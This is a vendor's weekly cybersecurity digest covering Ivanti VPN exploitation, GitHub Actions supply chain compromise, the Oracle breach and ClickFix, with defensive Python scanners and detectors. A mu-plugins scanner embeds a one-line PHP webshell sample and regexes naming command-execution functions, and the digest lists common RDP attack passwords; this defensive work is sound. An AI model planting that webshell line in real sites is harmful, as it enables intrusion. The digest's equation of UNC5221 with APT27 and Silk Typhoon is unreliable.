
Cybersecurity Weekly Digest: VPN Exploits, Oracle’s Silent Breach, and ClickFix Surge

The cybersecurity landscape continues to evolve at a rapid pace, with threat actors constantly finding new ways to exploit vulnerabilities in systems, applications, and human psychology. This week’s security developments highlight the critical importance of timely patching, robust supply chain security, and vigilant monitoring of system access. From sophisticated nation-state operations to lone-wolf threat actors, the diversity of cyber threats demands a comprehensive security approach.

Major Threat Alert: UNC5221 Exploits Ivanti VPN Vulnerability

A China-linked cyber espionage group tracked as UNC5221 (also known as APT27, Silk Typhoon, and UTA0178) has been observed exploiting a critical vulnerability in Ivanti Connect Secure VPN appliances. The flaw, tracked as CVE-2025-22457 (CVSS 9.0), is a stack-based buffer overflow that gives an unauthenticated remote attacker code execution on the appliance; the actors have used it to deploy a chain of malware including:

  • TRAILBLAZE – An in-memory-only dropper that stages the next payload without touching disk
  • BRUSHFIRE – A passive backdoor that waits for the attacker to connect rather than beaconing out
  • SPAWN – A malware ecosystem whose components include an installer (SPAWNANT), a tunneler (SPAWNMOLE), an SSH backdoor (SPAWNSNAIL) and a log-tampering utility (SPAWNSLOTH)

What makes this attack particularly concerning is how the exploit came about. Ivanti shipped the fix on February 11 in Connect Secure 22.7R2.6 as a product bug rather than an exploitable vulnerability, because the overflow only accepts digits and periods and was judged to allow at most a denial of service. The threat actors appear to have diffed that patch, worked out that remote code execution was still achievable, and then targeted the many organizations that had treated the update as non-urgent and delayed installing it.

This incident underscores the importance of implementing a comprehensive router and VPN security strategy to protect against network-level threats that could compromise your entire infrastructure.

Ivanti VPN Vulnerability Timeline

  • February 11, 2025 – Ivanti releases Connect Secure 22.7R2.6, which fixes CVE-2025-22457 (then assessed as a low-risk denial-of-service bug)
  • March 2025 – UNC5221 reverses the patch and develops a working remote code execution exploit; Mandiant dates the earliest observed exploitation to mid-March
  • Early April 2025 – Exploitation against unpatched appliances is detected in customer environments
  • April 3, 2025 – Ivanti and Google's Mandiant publicly disclose active exploitation

Source: Timeline constructed from security researcher reports and vendor disclosures
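The first question an operator has to answer is whether a given appliance is on a fixed build. The version check below is an added example written for this digest, not Ivanti's own tooling; the thresholds come from Ivanti's April 2025 advisory (Connect Secure 22.7R2.5 and earlier affected, 22.7R2.6 the first fixed release, the end-of-life 9.1R18.x Pulse Connect Secure train affected with no fix), and the inventory of hostnames and versions is constructed.

```python
"""Decide whether an Ivanti Connect Secure build still needs the CVE-2025-22457 fix.

Added example for this digest, not Ivanti's own tooling. Version thresholds are
taken from Ivanti's April 2025 advisory: Connect Secure 22.7R2.5 and earlier are
affected and 22.7R2.6 is the first fixed release; the end-of-life 9.1R18.x
(Pulse Connect Secure) train is affected and receives no fix.
"""
import re
from typing import Dict, List, Tuple

VERSION_RE = re.compile(r"^(\d+)\.(\d+)R(\d+)(?:\.(\d+))?$")
ICS_FIXED = "22.7R2.6"


def parse_version(version: str) -> Tuple[int, int, int, int]:
    """Turn '22.7R2.5' into (22, 7, 2, 5); a missing patch number counts as 0."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Ivanti version string: {version!r}")
    major, minor, release, patch = m.groups()
    return int(major), int(minor), int(release), int(patch or 0)


def assess(version: str) -> str:
    """Return 'patched', or a 'vulnerable (...)' verdict with the required action."""
    v = parse_version(version)
    if v[0] < 22:
        return "vulnerable (end-of-life train, no patch available; migrate)"
    if v < parse_version(ICS_FIXED):
        return f"vulnerable (upgrade to {ICS_FIXED} or later)"
    return "patched"


def triage(inventory: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """Sort a {hostname: version} inventory so the appliances needing action come first."""
    rows = [(host, ver, assess(ver)) for host, ver in inventory.items()]
    rows.sort(key=lambda r: (r[2] == "patched", r[0]))
    return rows


if __name__ == "__main__":
    # Constructed inventory for the example; hostnames and versions are made up.
    sample = {
        "vpn-eu-1": "22.7R2.5",
        "vpn-eu-2": "22.7R2.6",
        "vpn-us-1": "22.7R2.2",
        "vpn-legacy": "9.1R18.9",
    }
    for host, ver, verdict in triage(sample):
        print(f"{host:12} {ver:10} {verdict}")
```

Upgrading closes the entry point but does not evict an implant that is already on the box: Ivanti and Mandiant both advise running the external Integrity Checker Tool on every appliance that was exposed while unpatched, and performing a factory reset before rebuilding on a fixed version wherever it reports tampering.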

EncryptHub Ransomware Operator Unmasked

In a surprising development, the threat actor behind the emerging EncryptHub ransomware has been identified as likely operating alone, following a series of operational security mistakes. What makes this case particularly intriguing is the attacker’s dual life – contributing to legitimate security research while simultaneously conducting malicious campaigns.

The individual recently received acknowledgment from the Microsoft Security Response Center for discovering and reporting two vulnerabilities:

Even more unusual is the threat actor's reliance on OpenAI's ChatGPT for malware development, translation tasks, and even cybercriminal career guidance. In particularly revealing conversations, EncryptHub asked the AI to evaluate whether they were better suited to be a "black hat or white hat" hacker, or whether they should become "a cool hacker or a malicious researcher", going as far as confessing to criminal activities and describing the exploits they had developed.

As security firm Outpost24 noted, “When people think of cybercriminals, they tend to imagine high-tech, government-backed teams and elite hackers using cutting-edge technology. However, many hackers are normal people who at some point decided to follow a dark path.”

For more detailed analysis of the EncryptHub operation and technical indicators of compromise, check our comprehensive EncryptHub ransomware report.

Complex GitHub Supply Chain Attack Traced to SpotBugs PAT Theft

The recent GitHub Actions supply chain attack that initially targeted Coinbase has been traced back to the theft of a personal access token (PAT) belonging to a maintainer of the open-source SpotBugs project. This multi-stage attack demonstrates how tightly interconnected the modern software supply chain is:

  1. SpotBugs was initially compromised in November 2024, when a workflow that ran on the pull_request_target trigger exposed a maintainer's PAT to a malicious pull request
  2. Attackers used this access to push a malicious commit to "reviewdog/action-setup" and re-point its v1 tag at it
  3. That poisoned action, consumed by "tj-actions/eslint-changed-files", leaked a PAT that let the attackers rewrite every tag of "tj-actions/changed-files" to a malicious commit
  4. The compromised action leaked CI secrets from an estimated 218 repositories that ran it

The attack’s complexity stemmed from the fact that the maintainer of reviewdog also had access to SpotBugs repositories, creating a chain of trust that attackers exploited to move laterally across projects. This incident highlights the importance of securing developer tokens and implementing proper access controls in development environments.
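Every step of that chain worked because consumers referenced actions by mutable tags or branches that the attacker could re-point. The scanner below is an added example written for this digest (not GitHub's tooling and not code from the tj-actions or reviewdog projects); it flags every `uses:` line in a workflow that is not pinned to a full 40-character commit SHA. The workflow text is constructed, and the commit SHA on the checkout line is illustrative rather than a verified release.

```python
"""Find GitHub Actions `uses:` references that are not pinned to a commit SHA.

Added example for this digest, not GitHub's tooling and not code from the
tj-actions or reviewdog projects. The workflow text below is constructed; the
commit SHA on the checkout line is illustrative rather than a verified release.
"""
import re
from typing import List, Tuple

USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)")
SHA40_RE = re.compile(r"^[0-9a-f]{40}$")

SAMPLE_WORKFLOW = """\
name: ci
on: [pull_request]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683  # v4.2.2
      - uses: tj-actions/changed-files@v45
      - uses: reviewdog/action-setup@main
      - uses: ./.github/actions/local-lint
      - uses: docker://alpine:3.19
      - name: run tests
        run: make test
"""


def classify(ref: str) -> str:
    """Return 'ok (...)' or 'unpinned (...)' for one `uses:` reference."""
    if ref.startswith("./"):
        return "ok (local action from this repository)"
    if ref.startswith("docker://"):
        return ("ok (image digest)" if "@sha256:" in ref
                else "unpinned (docker tag; pin with @sha256:<digest>)")
    if "@" not in ref:
        return "unpinned (no ref at all, resolves to the default branch)"
    version = ref.rpartition("@")[2]
    if SHA40_RE.match(version):
        return "ok (commit SHA)"
    return f"unpinned (mutable ref {version!r} can be re-pointed by the action owner)"


def check_workflow(text: str) -> List[Tuple[int, str, str]]:
    """Return (line_number, reference, verdict) for every `uses:` line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = USES_RE.match(line)
        if m:
            findings.append((lineno, m.group(1), classify(m.group(1))))
    return findings


def unpinned(text: str) -> List[Tuple[int, str, str]]:
    """Only the findings that need fixing."""
    return [f for f in check_workflow(text) if f[2].startswith("unpinned")]


if __name__ == "__main__":
    for lineno, ref, verdict in check_workflow(SAMPLE_WORKFLOW):
        print(f"line {lineno:3}: {ref:60} {verdict}")
```

Pinning to a SHA is necessary because the attackers did not only publish a new release: they rewrote existing version tags retroactively, so even a specific tag such as `@v45.0.7` was pointing at the malicious commit. Pair the pin with a review of any workflow that uses `pull_request_target` with secrets available, and replace long-lived classic PATs with fine-grained, short-lived tokens.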

Oracle’s Silent Breach Privately Confirmed

Enterprise computing giant Oracle is privately informing customers of a significant data breach affecting a “legacy” Oracle environment, despite consistent public denials. According to reports, hackers compromised Oracle systems, exposing usernames, passkeys, and encrypted passwords.

What makes this incident particularly concerning:

  • Oracle has claimed to customers that the system hasn’t been in use for eight years and poses minimal risk
  • The FBI and CrowdStrike are actively investigating the incident
  • This is the second breach Oracle has acknowledged to clients in recent weeks
  • The breach is separate from another hack at Oracle Health (formerly Cerner) that affected US healthcare customers last month

Multiple cybersecurity firms including Black Kite, CloudSEK, CybelAngel, Hudson Rock, Orca Security, SOCRadar, Sygnia, and Trustwave have analyzed the data posted for sale online and validated it as directly extracted from Oracle.

Reporting indicates the attacker likely exploited an unpatched vulnerability in Oracle Fusion Middleware (CVE-2021-35587, an Oracle Access Manager flaw) to compromise Oracle Cloud's login and authentication system. According to CybelAngel, "This exposure was facilitated via a 2020 Java exploit and the hacker was able to install a web shell along with malware. The malware specifically targeted the Oracle IDM database and was able to exfil data."

Security researcher Kevin Beaumont noted that “Oracle are attempting to wordsmith statements around Oracle Cloud and use very specific words to avoid responsibility,” adding that “Oracle rebadged old Oracle Cloud services to be Oracle Classic. Oracle Classic has the security incident. Oracle are denying it on ‘Oracle Cloud’ by using this scope — but it’s still Oracle cloud services that Oracle manage. That’s part of the wordplay.”

This situation highlights the importance of taking data breaches seriously and responding with transparency rather than obfuscation.

North Korean Threat Actors Adopt ClickFix for GolangGhost Delivery

The North Korean threat group behind the ongoing Contagious Interview campaign has expanded its tactics to include the ClickFix social engineering technique, which sidesteps security controls by getting the user to copy a command and run it themselves, so that no exploit or malicious download has to get past the endpoint. This campaign now delivers a previously undocumented backdoor called GolangGhost.

Additionally, the group has published 11 malicious npm packages that deliver:

  • BeaverTail information stealer malware
  • A new remote access trojan (RAT) loader

These packages were downloaded more than 5,600 times before being removed from the npm registry. In parallel, the related North Korean IT worker operation appears to be shifting its focus from U.S. targets to European organizations as it expands its fraudulent employment schemes globally.

Google researchers observed these actors “engaging in a pattern of providing fabricated references, building a rapport with job recruiters, and using additional personas they controlled to vouch for their credibility.” More concerning, these actors are increasingly attempting to extort money from companies once they are discovered and fired.

The U.S. government has been working to raise awareness about this insider threat operation, targeting U.S.-based facilitators of the fraudulent scheme and uncovering the IT workers and front companies that help conceal their true origin. This enforcement pressure has likely caused the operators to focus on targets outside the US and adopt more aggressive revenue measures.

ClickFix has seen a significant surge in popularity among various threat actors. Recently, it has also been observed being used to deliver the previously dormant QakBot malware. The technique involves tricking victims into running malicious commands under the pretext of fixing issues, typically disguised as CAPTCHA verification challenges.

This growing threat is similar to other sophisticated RAT deployments that we’ve analyzed, including the Triton RAT malware and Lilith RAT campaigns.

Additional Security Developments

Counterfeit Android Phones Pre-loaded with Triada Malware

Investigators have discovered counterfeit versions of popular Android smartphone models being sold at reduced prices with pre-installed Triada malware. Most infections have been reported in Russia, suggesting a hardware supply chain compromise specifically targeting this region. This malware has previously spread through unofficial WhatsApp modifications and third-party app stores.

For comprehensive protection against Android malware and other threats, refer to our malware removal comprehensive guide.

WordPress mu-plugins Directory Abuse

Threat actors are increasingly targeting the WordPress mu-plugins ("must-use plugins") directory, wp-content/mu-plugins, to stealthily run malicious code. WordPress loads every PHP file in that directory on every request, the files do not show up in the standard plugin list (only under a separate Must-Use tab) and they cannot be deactivated from the dashboard, which makes the directory an ideal hiding place for persistent malicious code that can:

  • Steal credentials
  • Inject malicious code
  • Alter HTML output
  • Execute arbitrary commands
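Because nothing in the dashboard will tell you what is in that directory, the check has to be made on the file system. The inventory script below is an added example written for this digest (not WordPress core or WP-CLI code): it hashes every PHP file under mu-plugins and flags the patterns that webshells and droppers typically carry. The plugin tree is constructed in a temporary directory; the file names and contents are made up.

```python
"""Inventory wp-content/mu-plugins and flag PHP files with common webshell or
obfuscation patterns. Added example for this digest, not WordPress core or WP-CLI
code. The plugin tree below is constructed in a temporary directory; the file
names and contents are made up.
"""
import hashlib
import os
import re
import tempfile
from typing import Dict, List

SUSPICIOUS = [
    (re.compile(r"eval\s*\(\s*@?(base64_decode|gzinflate|gzuncompress|str_rot13)\b", re.I),
     "eval() of a decoded payload"),
    (re.compile(r"\b(shell_exec|passthru|proc_open|popen|system|exec)\s*\(", re.I),
     "command execution"),
    (re.compile(r"\beval\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
     "eval() of request data"),
    (re.compile(r"file_get_contents\s*\(\s*['\"]https?://", re.I),
     "fetches remote content"),
    (re.compile(r"(\\x[0-9a-f]{2}){8,}", re.I),
     "long hex-escaped string"),
]

# Constructed sample tree: two harmless files, a loader with its include, and
# one dropper that evaluates whatever arrives in a request parameter.
SAMPLE_FILES = {
    "index.php": "<?php\n// Silence is golden.\n",
    "loader.php": "<?php\nrequire_once WPMU_PLUGIN_DIR . '/site-tweaks/init.php';\n",
    "site-tweaks/init.php": "<?php\nadd_filter('xmlrpc_enabled', '__return_false');\n",
    "wp-cache-helper.php": (
        "<?php\n"
        "if (isset($_REQUEST['k'])) { @eval(base64_decode($_REQUEST['k'])); }\n"
        "add_action('wp_footer', function () { echo \"\\x3c\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\"; });\n"
    ),
}


def build_sample_tree() -> str:
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="mu-plugins-")
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


def scan_mu_plugins(root: str) -> List[Dict[str, object]]:
    """Return one record per PHP file: relative path, sha256, size and matched flags.

    WordPress auto-loads only the top-level *.php files in mu-plugins, but a
    loader there can require anything below it, so subdirectories are scanned too.
    Flagged files are sorted to the top.
    """
    records = []
    for dirpath, _, filenames in os.walk(root):
        for name in sorted(filenames):
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            text = data.decode("utf-8", errors="replace")
            flags = [label for pattern, label in SUSPICIOUS if pattern.search(text)]
            records.append({
                "path": os.path.relpath(path, root),
                "sha256": hashlib.sha256(data).hexdigest(),
                "size": len(data),
                "flags": flags,
            })
    records.sort(key=lambda r: (not r["flags"], r["path"]))
    return records


if __name__ == "__main__":
    for rec in scan_mu_plugins(build_sample_tree()):
        print(f"{rec['sha256'][:16]}  {rec['size']:6}  {rec['path']:28} {rec['flags'] or ''}")
```

Pattern matching catches the lazy cases; the stronger control is the hash column. Keep a signed inventory of the mu-plugins files you deployed on purpose (the WP-CLI command `wp plugin list --status=must-use` lists what WordPress will load) and alert on any file whose hash is not in it, regardless of what it contains.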

Most Common Passwords in RDP Attacks

Recent analysis of 15 million passwords used in Remote Desktop Protocol (RDP) attacks revealed the most common credentials that attackers try when conducting brute force or password spraying attacks:

  1. 123456
  2. 1234
  3. Password1
  4. 12345
  5. P@ssw0rd
  6. password
  7. Password123
  8. Welcome1
  9. 12345678
  10. Aa123456

This data highlights the critical importance of implementing strong password policies, especially for remote access services that are directly exposed to the internet.

Cybersecurity Tip of the Week: Track First-Time Connections

One of the most effective ways to detect threats early is by monitoring first-time connections to critical systems. Most attackers leave their initial trace not through malware, but when they first access your systems from new IPs, devices, or locations.

Implement these practices to enhance your security posture:

  • Focus monitoring on critical systems: VPNs, admin portals, cloud dashboards, and service accounts
  • Utilize free tools like Wazuh, OSQuery, or Graylog to detect new devices and unfamiliar connections
  • Create baselines of known users, IPs, and devices, then flag anything new
  • Set up alerts for suspicious scenarios, such as admin accounts logging in from new countries
  • Consider deploying honeytokens (fake credentials) to catch intruders probing your network

Remember: attackers can steal credentials, bypass MFA, or hide malware, but they cannot make their first connection look like one you have seen before. A new IP, device, or country on a critical account is always visible as new, provided you are keeping track.
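The baseline-and-diff logic those practices describe fits in a few dozen lines. The script below is an added example written for this digest (it is not Wazuh, OSQuery or Graylog configuration): it builds a per-user baseline of sources, countries and devices from a clean history of VPN logins, then flags anything new in today's events, escalating admin accounts seen from a new country and treating any use of a honeytoken account as critical. The log format, user names, addresses, device IDs, the admin list and the decoy account are all constructed.

```python
"""Flag first-time connections against a baseline of previously seen logins.

Added example for this digest, not Wazuh, OSQuery or Graylog configuration.
The log format, user names, addresses, device IDs, the admin list and the
honeytoken account are all constructed for the example.
"""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

LINE_RE = re.compile(
    r"^(?P<ts>\S+) vpn-login user=(?P<user>\S+) src=(?P<src>\S+) "
    r"country=(?P<country>[A-Z]{2}) device=(?P<device>\S+) result=(?P<result>\S+)$"
)
ATTRS = ("src", "country", "device")

ADMIN_USERS = {"alice"}                 # assumption: the privileged accounts
HONEYTOKEN_USERS = {"svc-backup-old"}   # decoy credential never used legitimately

# Constructed history covering a period believed to be clean.
HISTORY = """\
2025-03-03T08:01:10Z vpn-login user=alice src=198.51.100.7 country=DE device=lt-alice result=success
2025-03-04T08:05:42Z vpn-login user=alice src=198.51.100.7 country=DE device=lt-alice result=success
2025-03-04T09:17:03Z vpn-login user=bob src=203.0.113.22 country=DE device=lt-bob result=success
2025-03-05T07:58:19Z vpn-login user=bob src=203.0.113.22 country=DE device=lt-bob result=failure
2025-03-05T07:58:40Z vpn-login user=bob src=203.0.113.22 country=DE device=lt-bob result=success
"""

# Constructed "today": a routine login, an admin login from a new country and
# device, and an attempt against the decoy account.
TODAY = """\
2025-04-07T08:02:55Z vpn-login user=bob src=203.0.113.22 country=DE device=lt-bob result=success
2025-04-07T03:14:09Z vpn-login user=alice src=192.0.2.77 country=KP device=win-x1 result=success
2025-04-07T03:20:41Z vpn-login user=svc-backup-old src=192.0.2.77 country=KP device=win-x1 result=failure
"""

Baseline = Dict[str, Dict[str, Set[str]]]


def parse(text: str) -> List[Dict[str, str]]:
    """Parse log lines into dicts; lines that do not match the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def build_baseline(events: List[Dict[str, str]]) -> Baseline:
    """Per user, the sources, countries and devices seen in successful logins."""
    seen: Baseline = defaultdict(lambda: {k: set() for k in ATTRS})
    for e in events:
        if e["result"] != "success":       # a failed attempt does not prove the user was there
            continue
        for k in ATTRS:
            seen[e["user"]][k].add(e[k])
    return seen


def detect(events: List[Dict[str, str]], baseline: Baseline) -> List[Tuple[str, str, str]]:
    """Return (severity, user, reason) for every event that is new relative to the baseline."""
    alerts = []
    for e in events:
        user = e["user"]
        if user in HONEYTOKEN_USERS:
            alerts.append(("critical", user,
                           f"honeytoken account used from {e['src']} ({e['result']})"))
            continue
        known = baseline.get(user, {k: set() for k in ATTRS})   # unknown user: everything is new
        new = [k for k in ATTRS if e[k] not in known[k]]
        if not new:
            continue
        severity = "high" if user in ADMIN_USERS and "country" in new else "medium"
        alerts.append((severity, user, "first-time " + ", ".join(f"{k}={e[k]}" for k in new)))
    return alerts


if __name__ == "__main__":
    for alert in detect(parse(TODAY), build_baseline(parse(HISTORY))):
        print(alert)
```

Two caveats matter in practice: the baseline is only as trustworthy as the period it was built from, so build it from logs you have already reviewed, and new values should be promoted into the baseline only after an analyst has looked at the alert, otherwise the attacker's first login quietly becomes "known" for every login after it.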

Weekly Security Recommendations

Based on this week’s developments, we recommend implementing these security measures:

  1. Patch VPN and Remote Access Systems: Immediately apply updates for Ivanti Connect Secure and other remote access solutions, and run the vendor's integrity checker on any appliance that was exposed while unpatched
  2. Review CI/CD Security: Audit access to GitHub Actions and other CI/CD components, pin third-party actions to commit SHAs rather than tags, and apply least privilege to tokens and workflow permissions
  3. Strengthen Authentication: Implement strong, unique passwords and multi-factor authentication for all remote access
  4. Monitor for Anomalous Behaviors: Set up alerting for first-time connections and unexpected access patterns
  5. Verify Software Integrity: Implement software supply chain verification for all installed components

For comprehensive threat mitigation, consider using specialized security solutions like Trojan Killer to detect and remove sophisticated malware that might evade traditional security tools.


Trending CVEs This Week

Security vulnerabilities continue to be prime targets for attackers seeking entry points into systems. This week’s critical CVEs that security teams should address immediately include:

Other notable vulnerabilities include CVE-2025-20139 (Cisco Enterprise Chat and Email), CVE-2025-20212 (Cisco AnyConnect VPN server of Cisco Meraki MX and Z Series), CVE-2025-27520 (BentoML), and several WordPress plugin vulnerabilities including CVE-2025-2798 (Woffice CRM theme).

For protection against WordPress vulnerabilities and malicious plugins, refer to our guide on comprehensive malware removal strategies which includes specific WordPress security recommendations.

Conclusion

This week’s security developments highlight a crucial reality in cybersecurity: the threats that cause the most damage are often the ones that go undetected until it’s too late. From sophisticated state-sponsored attacks exploiting VPN vulnerabilities to lone actors developing ransomware with AI assistance, the threat landscape continues to evolve in complexity and scale.

Organizations must focus on fundamental security practices: timely patching, proper access controls, monitoring of first-time connections, and comprehensive supply chain security. As attackers continue to exploit both technical vulnerabilities and human psychology, a multi-layered defense strategy remains essential.

Stay vigilant, stay informed, and remember that in cybersecurity, prevention is always more effective than remediation.

Gridinsoft Team

Founded in 2003, GridinSoft LLC is a Kyiv, Ukraine-based cybersecurity company committed to safeguarding users from the ever-growing threats in the digital landscape. With over two decades of experience, we have earned a reputation as a trusted provider of innovative security solutions, protecting millions of users worldwide.
